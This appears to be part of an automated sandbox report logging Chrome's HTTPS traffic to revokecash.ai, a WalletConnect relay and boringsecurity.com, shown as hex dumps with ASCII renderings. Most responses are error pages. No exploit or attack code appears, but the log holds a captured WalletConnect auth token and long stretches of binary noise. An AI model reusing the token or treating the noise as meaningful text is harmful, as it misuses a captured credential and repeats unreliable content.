                                                                          Data Ascii: x4#>>if|kv?Hfp58o_4msbQey}}|>k"@Z57V0@DDW9229eKy>=5iDHnLn]:DL`nP/w73DDl=7&[$fUE<|f>>>>}s"
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: a4 01 c1 e3 f1 4e 88 aa 3d c2 c7 18 fb 7e 3b 8e 27 22 fe f2 f5 1b 22 21 52 64 8c 31 09 69 db b6 f3 3c cd dd 23 10 b0 9e f4 79 3c cd bc b5 2e 44 73 ce 7d df 45 45 90 b1 00 13 00 02 46 84 6a 33 f7 b5 6c d8 0a 8f 39 c6 b0 d9 da 95 f0 10 d2 39 07 20 a8 2a 00 f5 d6 20 e1 18 c7 ad df 98 69 8c 53 44 44 d5 dd bb 36 48 d0 a6 ee 4e 4c 48 bc b5 ae 5d cd 8c 08 6f b7 3b 13 21 12 20 ac 69 11 a1 2c 1e 5e 46 14 11 db b6 5d d6 2d 42 c4 22 12 1e 80 00 90 fb 7e 6f 4d 89 58 a5 45 c4 e3 f9 20 e6 de 3b 11 aa 6a 59 62 6b 0d 11 cb bb 96 a1 d5 87 aa da 9a 26 a4 b0 34 6d 3f 7f be df 6e 77 66 26 a4 e7 f3 c9 c4 b6 5c 44 b4 89 88 3e 9f 47 39 e7 b9 ec 38 9f 84 64 be ce f3 54 6d 05 68 12 82 85 08 39 2a 6c 20 22 60 84 03 c2 9c f3 33 1d dd f6 0d 91 f6 fd a6 a2 44 f4 a7 3f fd e9 bf fd b7
                                                                          Data Ascii: N=~;'""!Rd1i<#y<.Ds}EEFj3l99 * iSDD6HNLH]o;! i,^F]-B"~oMXE ;jYbk&4m?nwf&\D>G98dTmh9*l "`3D?
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: 66 5e 3e 97 cd ad ef 08 24 4a 11 17 fb 82 88 11 61 66 aa 4d b5 8b d4 fe 37 2d 6a fc da 9f 42 c4 ad 35 4c 24 62 c0 6c da 99 c5 7c 20 12 93 dc ef 6f 2c f4 3c 9f ee 2b 13 98 34 d3 dd 0c 00 01 e1 f1 78 d8 5a 7d df be 7f ff 47 44 de ef 37 77 57 6d c8 90 e1 00 20 ca 90 a8 da 98 b4 48 44 22 8a f0 c7 f3 e3 e7 cf 8f 73 9c c4 24 ac e6 cb 96 95 83 5a 6b 11 63 d3 36 e7 b2 98 aa 4d a5 95 93 89 88 65 83 85 21 f1 fd fb 7f f5 d6 01 38 23 d6 5a 65 f5 bd f7 31 46 f9 a2 f3 3c f3 e5 90 2f e7 09 e0 ee e5 1b cb f3 94 cb aa bf 7e a6 31 c5 46 37 d5 c8 04 84 71 0e 44 5c 6b 15 1f 59 df ad cb 8a 07 ca cc 7a 8f 7f 48 62 8f e3 10 e6 d6 fb 5a ab 00 47 cd 7f 21 8f 7c 45 cd 39 e7 5a ab d8 cd 39 cf d6 3a 22 42 a5 66 44 73 ce 32 d5 62 f5 3e d1 4c 8d b9 b5 46 04 73 0e 24 66 40 b7 05 48 b5
                                                                          Data Ascii: f^>$JafM7-jB5L$bl| o,<+4xZ}GD7wWm HD"s$Zkc6Me!8#Ze1F</~1F7qD\kYzHbZG!|E9Z9:"BfDs2b>LFs$f@H
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: c7 8f 1f e5 03 23 22 bc 4a 66 e5 51 e3 d3 d1 15 85 56 c8 26 22 d6 9a 95 06 d7 8c 15 f6 da b6 ad e8 ba ad 6f 66 f6 78 3c f4 25 e4 00 80 42 84 88 28 22 05 e0 0a 7e d5 14 d5 27 a2 52 79 6b a6 27 84 b2 96 3b 95 4b f5 91 f8 07 c8 c8 cc db b6 bd 74 17 17 13 56 17 d4 d3 d5 65 6b ad cf c1 57 0d a7 36 03 13 9f e3 64 6d f7 db ad 70 9e bc d8 ca ae fa 89 26 2b c8 8a ea 72 67 96 08 ab 38 18 99 44 57 a8 56 22 84 5c 66 ee 06 99 f5 95 39 06 20 46 84 47 00 a2 20 fe f8 f1 a3 f8 aa 5b df 7a 53 ad 82 26 61 66 9e 73 46 d5 af 22 54 a4 18 42 44 54 e6 70 af 50 12 11 6f db de 5b 2b 18 c7 84 cb d6 39 a7 87 db ab 4e 5d 21 ac a6 cb dd 09 11 32 d7 f2 cc 84 cc b5 cc 23 dd 2c 21 b5 35 65 62 66 40 5c cb cd 97 aa b6 d6 32 21 dc 59 d4 c3 59 08 32 99 45 98 89 d1 dd 5a 6b 6f 6f 77 55 d9 b6
                                                                          Data Ascii: #"JfQV&"ofx<%B("~'Ryk';KtVekW6dmp&+rg8DWV"\f9 FG [zS&afsF"TBDTpPo[+9N]!2#,!5ebf@\2!YY2EZkoowU
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: a9 2a 8b 44 c4 18 03 01 6a 6a ca 4d 13 42 19 39 00 54 88 67 e6 63 0c 77 07 44 61 41 80 65 7e 9e 67 e9 66 6a 6e c3 dd dd 11 a0 60 dc 9c 2b 5f c8 95 90 90 10 32 b4 35 44 54 91 2a 01 47 5c b2 b0 d6 7b 6b 97 c0 c6 8b fa 05 f0 f0 7d db bb 6a d5 46 8a 89 9c 6b 21 24 fd a1 36 7d 3c 8f cc 64 26 0f a8 d9 0b 8f 44 28 95 59 49 ea 91 88 89 dc 9d a5 94 94 5e 1b 18 11 ea ba cc c0 44 0b cf 48 00 70 f7 30 07 00 20 2a 76 dc 3d 20 f3 ca a1 89 7b 6b 6e 06 00 aa ed 02 50 08 11 c5 b9 00 21 42 d5 43 19 23 a2 50 03 66 12 2b 11 b9 5b 78 22 31 24 20 b1 36 46 a2 70 47 64 04 cc c8 17 c1 cd 00 c0 44 08 49 42 d7 8f 03 86 07 13 69 ef 54 14 72 29 7f 00 ca ef 45 26 ff fb bf ff 3d 22 4a aa 4c 24 da 1a bc d2 85 eb de cc 85 3d 01 00 09 dd c3 dd a0 d4 00 48 2c 1c 19 90 99 97 66 33 cf f3 fc
                                                                          Data Ascii: *DjjMB9TgcwDaAe~gfjn`+_25DT*G\{k}jFk!$6}<d&D(YI^DHp0 *v= {knP!BC#Pf+[x"1$ 6FpGdDIBiTr)E&="JL$=H,f3
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: e5 4b 9e 85 00 ee c6 ff fe 7f fc ef 91 e1 66 cc 4c 58 bf ea 40 22 4c 2f ae a8 b1 32 21 88 2a b3 ac 65 88 a0 4d 3d 9c 58 44 04 01 ae 7d 8f 44 88 3f 1f cf e7 39 88 70 7b d5 d7 6a bb 23 62 26 66 a6 a7 13 52 46 a8 2a 33 85 9b 79 54 7d da 5f f2 82 4c 27 a2 c8 0c 0b 37 47 4c 51 1e c7 09 88 09 90 1e 88 e0 01 9f a6 55 d6 15 09 08 50 5e 1b 11 eb bd 30 17 aa b8 e6 88 c9 dc dc 3c 81 08 91 99 dc c3 ac a8 32 28 80 f4 62 50 a0 0a f6 11 20 c2 66 11 11 00 59 19 83 aa 20 91 9b 05 e4 e7 b6 70 77 ba aa 30 61 af 62 56 44 24 80 56 df 07 33 b3 64 3a 24 88 6a c1 b5 42 42 88 d8 5a 43 84 f3 9c bd b7 42 87 db be 7b 44 59 bb 99 e7 eb 41 ea 8b 45 bc 13 11 22 8a 5c 8a 99 84 0b 59 9a 19 11 d5 60 86 cd 39 ed 2c df 1a 11 11 35 b0 ca ff 6a f9 44 2e ab 3b 8e 43 5b 8b 88 f3 3c eb 02 66 46
                                                                          Data Ascii: KfLX@"L/2!*eM=XD}D?9p{j#b&fRF*3yT}_L'7GLQUP^0<2(bP fY pw0abVD$V3d:$jBBZCB{DYAE"\Y`9,5jD.;C[<fF
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: c7 25 be b6 08 42 e9 f1 c1 dd 01 2e b6 bc 32 8c b2 ff 82 47 c2 5c cd 1a 35 8c b8 40 9b b5 76 15 5b 89 ae 96 91 f2 2f af 27 0b 61 45 22 15 61 ae ca 23 ac eb ac 96 3c 8e 13 90 5e 1f 4e 00 30 33 11 cd cc 65 ce cc e5 c5 ea 02 42 2c 1c a6 ad dd ee f7 8c a0 17 52 2c 87 18 11 ee d7 b0 4b cc 21 2f 69 48 c1 e6 ad 6f 4c 6c b6 f2 c5 cc 8b b4 08 af 1e b7 cc 00 c0 d6 1a 40 94 43 57 d5 4c 6f 4d 5a db 10 d3 cd 5a 6f 73 8e da 18 73 2e 11 56 6d e7 79 30 13 13 32 13 64 f6 ad 6f 7d 27 44 c2 d2 0a 0b 61 da 9a d5 5f fd 0a 8d 04 80 11 51 47 c9 10 a2 85 33 42 6f 62 19 e1 b6 6d dd c3 3d 80 95 9b 72 ac d5 b6 2d 13 e6 74 8f e8 bd cf b1 22 42 54 dd a3 b5 9e 18 99 c0 24 48 89 78 59 20 4b 23 04 5b cb dc 55 34 13 dc d2 dd 81 2f 16 96 85 9e 1f 67 a6 ab 6a ef db fb cf c7 fd f6 c6 55 37
                                                                          Data Ascii: %B.2G\5@v[/'aE"a#<^N03eB,R,K!/iHoLl@CWLoMZZoss.Vmy02do}'Da_QG3Bobm=r-t"BT$HxY K#[U4/gjU7
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: 64 12 00 c8 0c 24 11 a2 cc 68 b7 9d 90 98 08 20 13 d2 dc e6 9c 88 50 79 12 14 e3 93 84 40 cc ec 11 22 fc cb 2f bf 1e e7 61 6b 54 09 ac 60 81 aa 8e 31 dc 7d df f7 cc 44 8f e3 1c b7 fb ed fe 76 87 57 43 d6 79 9c e1 7e bb dd b6 db 5e b5 a7 c8 64 11 22 f6 08 9f 6b 8e 51 32 ed 8c 18 15 fc 98 e6 9a f4 aa b7 26 c4 3c 8f b5 cc 33 cd ad a9 5e b9 0e e0 d6 b7 d2 90 d5 f6 ab bd b1 7c 09 4b d9 40 75 00 00 22 12 f6 6d 1f f3 44 24 61 9d 36 c3 fd e3 fd c3 cc 88 69 eb db 58 73 ae d9 5b 7f 1c 4f 20 78 7b fb 12 01 01 4e 88 10 10 11 6b 8d 84 24 91 c8 1c 6b 30 f3 fb fb cf c8 d8 f6 9b bb bd bd dd bf ff fe bb 9b 6d db 96 99 ad 35 80 3c cf a3 8c d2 5e 1a 23 11 c1 cc 5f be fe 7a df ef 00 b0 d6 bc 1c 32 2b 41 de f6 bb 6a 8f da 12 da c2 23 21 9a b6 12 fc a9 e8 56 3a cb 70 16 fe 7a
                                                                          Data Ascii: d$h Py@"/akT`1}DvWCy~^d"kQ2&<3^|K@u"mD$a6iXs[O x{Nk$k0m5<^#_z2+Aj#!V:pz


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          72192.168.2.549798104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:32 UTC645OUTGET /learn/faq HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:32 UTC678INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 46 2d 43 61 63
                                                                          Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 10 Dec 2023 16:44:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffCF-Cac
                                                                          2023-12-10 16:44:32 UTC154INData Raw: 39 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 6c 65 61 72 6e 2f 66 61 71 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                          Data Ascii: 94<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /learn/faq</pre></body></html>
                                                                          2023-12-10 16:44:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          73192.168.2.549801172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:32 UTC391OUTGET /init HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"
                                                                          2023-12-10 16:44:32 UTC576INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 32 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 45 54 61 67 3a 20 57 2f 22 63 2d 72 44 75 32 73 6b 61 65 4c 33 6d 75 54 73 64 53 4f 74 30 7a 56 37 66 49 2b 6b 63 22 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 70 7a 47 45
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedDate: Sun, 10 Dec 2023 16:44:32 GMTConnection: closeX-Powered-By: ExpressETag: W/"c-rDu2skaeL3muTsdSOt0zV7fI+kc"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pzGE


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          74192.168.2.54979718.141.17.514435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:32 UTC1048OUTGET /?auth=eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJkaWQ6a2V5Ono2TWt0cWZHOEFlMTE1M1k2TnBrTmZUVk1XYUo4YUs3dFRwbTRwMzJydWhUZFExWCIsInN1YiI6IjUxZWJiYzg4YTBiZDMxMDI5ZGUxM2QyYjAwOGNjY2U5Mjc3NjEzOGI5YmJkZTAxMzcxMTQ5ZGQ5ZWM0YzA1YzYiLCJhdWQiOiJ3c3M6Ly9yZWxheS53YWxsZXRjb25uZWN0Lm9yZyIsImlhdCI6MTcwMjIyNjY3MCwiZXhwIjoxNzAyMzEzMDcwfQ.Ksnssgch7O9_s2QwBldJoDsuqio5h-UjGol65nFFL8ubcBFiX7_5nF0M_Okgh51FBtAJ1hjt3mZtZcc1D33uCQ&projectId=4de540f0804c83871ac4d89ebb9031e9&ua=wc-2%2Fjs-2.9.0%2Fwindows10-chrome-117.0.0%2Fbrowser%3Arevokecash.ai&useOnCloseEvent=true HTTP/1.1
                                                                          Host: relay.walletconnect.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://revokecash.ai
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: 85cGjnJTmKzRhVbQozZSvg==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:44:34 UTC126INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 34 33 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 34 20 47 4d 54 0d 0a 0d 0a
                                                                          Data Ascii: HTTP/1.1 400 Bad Requestcontent-type: text/plain; charset=utf-8content-length: 43date: Sun, 10 Dec 2023 16:44:34 GMT
                                                                          2023-12-10 16:44:34 UTC43INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 75 70 67 72 61 64 65 27
                                                                          Data Ascii: Connection header did not include 'upgrade'


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          75192.168.2.549802104.21.1.2284435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:34 UTC648OUTGET /sponsorships HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:34 UTC680INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 43 46 2d 43 61 63
                                                                          Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 10 Dec 2023 16:44:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffCF-Cac
                                                                          2023-12-10 16:44:34 UTC157INData Raw: 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 73 70 6f 6e 73 6f 72 73 68 69 70 73 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                          Data Ascii: 97<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /sponsorships</pre></body></html>
                                                                          2023-12-10 16:44:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          76192.168.2.54980575.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:39 UTC641OUTGET / HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Upgrade-Insecure-Requests: 1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: navigate
                                                                          Sec-Fetch-Dest: document
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:47 UTC459INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 67 65 3a 20 38 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 34 37 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 72 72 6c 6e 63 6a 7a 75 63 39 62 36 7a 74 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69
                                                                          Data Ascii: HTTP/1.1 200 OKAge: 8Cache-Control: private,no-cache,no-store,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Type: text/html; charset=utf-8Date: Sun, 10 Dec 2023 16:44:47 GMTEtag: "rrlncjzuc9b6zt"Server: NetlifyStri
                                                                          2023-12-10 16:44:47 UTC727INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6d 69 6e 2d 68 2d 73 63 72 65 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 74 69 74 6c 65 3e 42 6f 72 69 6e 67 20 53 65 63 75 72 69 74 79 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 76 65 72 79 64 61 79 20 70 65 6f 70 6c 65 20 61 72 65 20 62 65 69 6e 67 20 61 74 74 61 63 6b 65 64 20 61 6e 64 20 73 63 61 6d 6d 65 64 20 69 6e 20 57 65
                                                                          Data Ascii: 8000<!DOCTYPE html><html class="min-h-screen" lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>Boring Security</title><meta name="description" content="Everyday people are being attacked and scammed in We
                                                                          2023-12-10 16:44:47 UTC2372INData Raw: 65 79 20 63 61 6e 20 64 6f 20 74 6f 20 72 65 6d 61 69 6e 20 73 61 66 65 20 69 6e 20 74 68 69 73 20 65 76 65 72 2d 65 76 6f 6c 76 69 6e 67 20 73 70 61 63 65 2e 20 57 65 20 70 72 6f 76 69 64 65 20 66 72 65 65 20 63 6c 61 73 73 65 73 2c 20 72 65 73 6f 75 72 63 65 73 2c 20 74 6f 6f 6c 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 61 6c 20 6d 61 74 65 72 69 61 6c 20 74 6f 20 74 68 65 20 63 6f 6d 6d 75 6e 69 74 79 20 73 6f 20 74 68 61 74 20 74 68 65 79 20 63 61 6e 20 70 72 65 76 65 6e 74 20 74 68 65 6d 73 65 6c 76 65 73 20 66 72 6f 6d 20 62 65 63 6f 6d 69 6e 67 20 74 68 65 20 6e 65 78 74 20 76 69 63 74 69 6d 2e 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f
                                                                          Data Ascii: ey can do to remain safe in this ever-evolving space. We provide free classes, resources, tools, and other informational material to the community so that they can prevent themselves from becoming the next victim."/><meta name="og:image" content="https://
